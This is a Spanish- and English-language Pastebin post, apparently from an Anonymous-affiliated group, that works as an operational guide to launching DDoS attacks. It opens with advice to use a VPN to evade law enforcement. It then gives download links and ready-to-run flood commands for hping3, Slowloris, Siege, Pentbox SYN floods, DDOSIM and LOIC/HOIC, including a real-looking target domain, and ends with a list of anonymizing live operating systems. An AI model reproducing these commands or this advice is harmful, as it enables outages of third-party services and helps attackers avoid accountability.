Advertisement
AnonimosHispano

Setup

Aug 18th, 2013
268
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.45 KB | None | 0 0
  1. VPN:
  2. ANTES DE USAR ESTAS TECNICAS DE DDOS, DEBES TENER INSTALADA Y ACTIVADA UNA VPN.
  3. Una VPN oculta su IP real y lo sustituye por el túnel atreves de el cual se está conectando, esto significa que son muy difíciles de rastrear - no imposible, sin embargo.
  4. NO proxy o TOR, eso jode al proxy o a la red TOR. VPN's Gratis mantienen los registros de actividad de los usuarios y fácilmente pueden entregar a cualquier agencia del orden público sus datos. Me permito sugerir algunos proveedores de VPN que son de confianza y no mantener los registros.
  5.  
  6.  
  7. Herramientas de prueba de redes (stress), las alternativas a LOIC:
  8. 1. "hping"
  9. http://www.hping.org/download.php - Windows / Linux
  10. Sistema fácil de usar, cuando se ha descargado para su adecuado OS por favor instale y utilizar por medio de cualquiera de los paquetes TCP o UDP.
  11. http://www.youtube.com/watch?v=fagjmQi-sBY
  12. http://www.youtube.com/watch?v=fRxnzAWX5ag
  13. COMANDO hping: hping3-i u1-S-p 80 (targetURL)
  14.  
  15. 2. "slowloris"
  16. http://ha.ckers.org/slowloris/ - Linux
  17. Este script es un script http DOS, debe tener Perl instalado.
  18. http://www.youtube.com/watch?v=kPo8wVxsXAA
  19.  
  20. 3. "HOIC"
  21. http://www.mediafire.com/?alj2soahc70ha6w - Windows.
  22. Al igual que hping, esto es más poderoso que LOIC y muy fácil de usar, instalar y debe quedar claro a partir de ahí.
  23. http://www.youtube.com/watch?v=qmhDQtsbPAk
  24.  
  25. NOTA IMPORTANTE:
  26. Úsalos únicamente cuando haya targets activos.
  27.  
  28. NO NOS HACEMOS RESPONSABLES POR NINGUNA MANÍA QUE PUEDAS CAUSAR CON ELLOS.
  29.  
  30.  
  31. Ataque DDOS a través de Slowloris para Windows (32 y 64).
  32.  
  33. Slowloris, es una herramienta escrita por Robert "RSnake" Hansen, que permite con una sola máquina saturar el servidor web de otra máquina usando un mínimo de ancho de banda.
  34.  
  35. En Windows:
  36.  
  37. A. Instalar PERL
  38.  
  39. - Nos vamos a la página de http://www.activestate.com/activeperl/downloads
  40.  
  41. - Descargamos la versión de Activeperl que corresponde a su versión de Windows (x86 o x64)
  42.  
  43. - La instalación es muy sencilla, solo sigan las instrucciones, no desactiven nada.
  44.  
  45. B. Descargar Slowloris
  46.  
  47. - Después de instalar Activeperl, nos vamos a la web de Slowloris y lo descargamos:
  48.  
  49. http://ha.ckers.org/slowloris/slowloris.pl
  50.  
  51. C. Ejecutar
  52.  
  53. - Abren una consola de DOS, para los que olvidaron de la existencia del DOS o nunca lo han escuchado, simplemente van al botón INICIO de Windows y luego en EJECUTAR, en la ventana de ejecución colocan: CMD y luego en aceptar.
  54.  
  55. - Ejecutan el script de Slowloris, ubicados en el directorio donde descargaron el script, con la siguiente sintaxis:
  56. perl slowloris.pl -dns <URL>
  57.  
  58. Ejemplo
  59.  
  60. Si tenemos como target u objetivo: www.unawebcualquiera.com lo ejecutamos de esta manera:
  61.  
  62. perl slowloris.pl -dns www.unawebcualquiera.com
  63.  
  64. Existen más parámetros para ejecutar Slowloris, puedes verlas ejecutando:
  65. perldoc slowloris.pl
  66.  
  67. D. Más información en: http://ha.ckers.org/slowloris/
  68.  
  69. En Linux:
  70. Por lo general las distribuciones de Linux vienen con Perl instalado, por lo tanto lo único que deben hacer es
  71. descargar el Slowloris y usarlo. La sintaxis de uso es la misma.
  72.  
  73.  
  74. Ataque DDOS a través de Siege Linux
  75.  
  76. Siege, es una herramienta desarrollada por Jeffrey Fulmer, diseñada para realizar pruebas de estrés. Es
  77. utilizada por desarrolladores web para medir el rendimiento de su código bajo coacción, mediante la creación de un
  78. número de visitas simultáneas, por un periodo de tiempo.
  79.  
  80. A. Instalación
  81.  
  82. Muchas distribuciones tienen el binario de Siege disponible en el repositorio de paquetes. Abrir una ventana de
  83. terminal y utilizar los siguientes comandos:
  84.  
  85. - En distribuciones basadas en Debian
  86.  
  87. apt-get install siege
  88.  
  89. Aceptar las dependencias.
  90.  
  91. - En distribuciones basadas en Red Hat
  92.  
  93. yum install siege
  94.  
  95. Aceptar las dependencias.
  96.  
  97. - En ArchLinux
  98.  
  99. pacman -S siege
  100.  
  101. Aceptar las dependencias.
  102.  
  103. B. Ejecutar
  104.  
  105. Abrir una ventana de terminal y utilizar la siguiente sintaxis básica:
  106.  
  107. siege -c<NUM> -t<NUM> -d<NUM> <URL>
  108.  
  109. Donde:
  110.  
  111. -c Es el número de usuarios para simular las conexiones simultaneas
  112. -t El tiempo de ejecución
  113. -d Es el delay en segundos que cada usuario simulado va a tener entre 1 y NUM, se recomienda utilizar 1
  114.  
  115. Ejemplo
  116.  
  117. Si tenemos como target u objetivo: www.unawebcualquiera.com lo ejecutamos de esta manera:
  118.  
  119. siege -c350 -t30M -d1 www.unawebcualquiera.com
  120.  
  121. En este caso, se van a crear 350 conexiones simultáneas durante 30 minutos.
  122.  
  123. C. Más información en: http://www.joedog.org/index/siege-manual
  124.  
  125.  
  126.  
  127. LOIC
  128. Download:
  129. https://github.com/NewEraCracker/LOIC/downloads
  130. Usage:
  131.  
  132. HOIC
  133. Download:
  134. http://hoic.99k.org
  135.  
  136. Pentbox
  137. http://www.pentbox.net/download-pentbox/
  138.  
  139.  
  140. Slowloris
  141. http://www.multiupload.nl/8KT494DULW
  142.  
  143. Usage:
  144. http://pastebin.com/5deha9Ug
  145.  
  146.  
  147. r-u-dead-yet?
  148. http://www.hybridsec.com/tools/rudy/
  149.  
  150.  
  151. hping2
  152. Download:
  153. http://www.hping.org/
  154. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  155. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  156.  
  157.  
  158.  
  159. for advanced users:
  160. http://www.thc.org/thc-ssl-dos/
  161.  
  162.  
  163.  
  164. linux
  165. ---------------------------------------------------------------------------------------------------------
  166.  
  167. Pentbox includes :
  168. TCP Flood DoSer
  169. TCP Flood AutoDoSer
  170. Spoofed SYN Flood DoSer [nmap - hping3] <-- best 4 our actions!
  171. Port scanner
  172. Honeypot
  173. PenTBox Secure Instant Messaging
  174. No Hivemode mode included, must fire manually.
  175.  
  176. Download:
  177. http://www.pentbox.net/download-pentbox/ <---
  178. use it as standalone or better with hping3 (see above)
  179.  
  180. startin terminal:
  181. sudo su
  182. cd pentbox
  183. ruby pentbox.rb
  184.  
  185. then type:
  186. 2
  187. 1
  188. 2
  189. input target example: leader.ir
  190. input target port : 80
  191. as default u use random sources but for beeing more effective use it with ur own packages.
  192.  
  193.  
  194. hping3
  195. Download:
  196. http://www.hping.org/hping3-20051105.tar.gz
  197.  
  198. Usage:
  199. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  200. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  201.  
  202.  
  203. slowloris
  204. http://ha.ckers.org/slowloris/
  205.  
  206. Download & Install:
  207. http://ha.ckers.org/slowloris/slowloris.pl
  208.  
  209. perl -MCPAN -e 'install IO::Socket::INET'
  210. perl -MCPAN -e 'install IO::Socket::SSL' | http://search.cpan.org/CPAN/authors/id/B/BE/BEHROOZI/IO-Socket-SSL-0.97.tar.gz
  211. perl -MCPAN -e ’install GetOpt::Long' | http://search.cpan.org/CPAN/authors/id/J/JV/JV/Getopt-Long-2.38.tar.gz
  212.  
  213. Usage:
  214. sudo su
  215. perl slowloris.pl
  216.  
  217. examples:
  218. http ddos ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
  219. https ddos ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
  220. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  221.  
  222.  
  223. loiq
  224. http://sourceforge.net/projects/loiq/files/
  225.  
  226.  
  227. pyloris
  228. ...can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.
  229.  
  230. Download:
  231. http://sourceforge.net/projects/pyloris/files/pyloris/3.2/pyloris-3.2.tgz/download
  232.  
  233.  
  234. pyloic (python loic)
  235.  
  236. Download:
  237. https://github.com/kenkeiras/pyLOIC/downloads
  238.  
  239. Usage:
  240.  
  241.  
  242. r-u-dead-yet?
  243. Download:
  244. http://www.hybridsec.com/tools/rudy/
  245.  
  246.  
  247. DDOSIM
  248. Info:
  249. http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/
  250. Download:
  251. http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz/download
  252.  
  253. Usage:
  254. ./ddosim
  255. -d IP Target IP address
  256. -p PORT Target port
  257. [-k NET] Source IP from class C network (ex. 10.4.4.0)
  258. [-i IFNAME] Output interface name
  259. [-c COUNT] Number of connections to establish
  260. [-w DELAY] Delay (in milliseconds) between SYN packets
  261. [-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
  262. [-t NRTHREADS] Number of threads to use when sending packets (default 1)
  263. [-n] Do not spoof source address (use local address)
  264. [-v] Verbose mode (slower)
  265. [-h] Print this help message
  266. Examples:
  267. 1. Establish 10 TCP connections from random IP addresses to www server and send invalid HTTP requests (similar to a DC++ based attack):
  268. ./ddosim -d 192.168.1.2 -p 80 -c 10 -r HTTP_INVALID -i eth0
  269. 2. Establish infinite connections from source network 10.4.4.0 to SMTP server and send EHLO requests:
  270. ./ddosim -d 192.168.1.2 -p 25 -k 10.4.4.0 -c 0 -r SMTP_EHLO -i eth0
  271. 3. Establish infinite connections at higher speed to www server and make HTTP valid requests:
  272. ./ddosim -d 192.168.1.2 -p 80 -c 0 -w 0 -t 10 -r HTTP_VALID -i eth0
  273. 4. Establish infinite TCP connections (without sending a Layer 7 request) from local address to a POP3 server:
  274. ./ddosim -d 192.168.1.2 -p 110 -c 0 -i eth0
  275.  
  276.  
  277.  
  278. for advanced users:
  279. http://www.thc.org/thc-ssl-dos/
  280.  
  281.  
  282.  
  283. MAC
  284. ---------------------------------------------------------------------------------------------------------
  285. ZAP
  286. http://www.cowfight.com/cf4/zapattack/
  287. http://www.cowfight.com/cf4/zapattack/
  288.  
  289.  
  290. Pentbox
  291. http://www.pentbox.net/download-pentbox/
  292.  
  293.  
  294. HowTo use LOIC (or others) on a MAC using MONO:
  295. https://github.com/NewEraCracker/LOIC/wiki/How-to-run-LOIC-using-Mono
  296.  
  297.  
  298.  
  299.  
  300. Operation Systems
  301. ---------------------------------------------------------------------------------------------------------
  302. http://insurgen.cc/index.php?title=L/i/nux
  303. http://insurgen.cc/index.php?title=W/i/ndows
  304.  
  305.  
  306. AnonOS
  307. http://operationcelebration.net/wiki/AnonOS
  308.  
  309.  
  310. Annonaceae v.0.0.3 MELCHISEDEK (PROJECT BASIS.) http://www.filefactory.com/file/b513ah8/n/annonaceae.iso
  311.  
  312.  
  313. AnonOS (Strictly Defensive)
  314. Rebulding is planned! v0.1 (initial!) http://piratenpad.de/AnonOS-v0-1 Documentation: http://piratepad.net/3540VLXFg7
  315.  
  316.  
  317. Cherimoya Internet Security LiveCD (for raids)
  318. v.0.0.1 MELCHISEDEK (Merged from another project) http://ge.tt/3nrRkBf Documentation: http://piratepad.net/3540VLXFg7
  319.  
  320.  
  321. TAILS
  322. https://amnesia.boum.org/
  323. Download:
  324. http://dl.amnesia.boum.org/tails/stable/
  325.  
  326.  
  327. AnonymOS
  328. http://sourceforge.net/projects/anonym-os/files/Anonym.OS%20Live%20CD/ShmooCon%202006/anonymos-shmoo.iso/download
  329.  
  330.  
  331. Liberte Linux - persistent,portable USB OS 4 anon communikation
  332. http://dee.su/liberte
  333.  
  334. Download:
  335. http://sourceforge.net/projects/liberte/files/2010.1/liberte-2010.1.zip/download
  336.  
  337.  
  338. Privatix - persistent,portable USB OS 4 privacy & encryption
  339. http://download.kommunikationssystem.de/privatix_10.02.07_de.iso
  340.  
  341.  
  342. to make linux distros portable use http://unetbootin.sourceforge.net/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement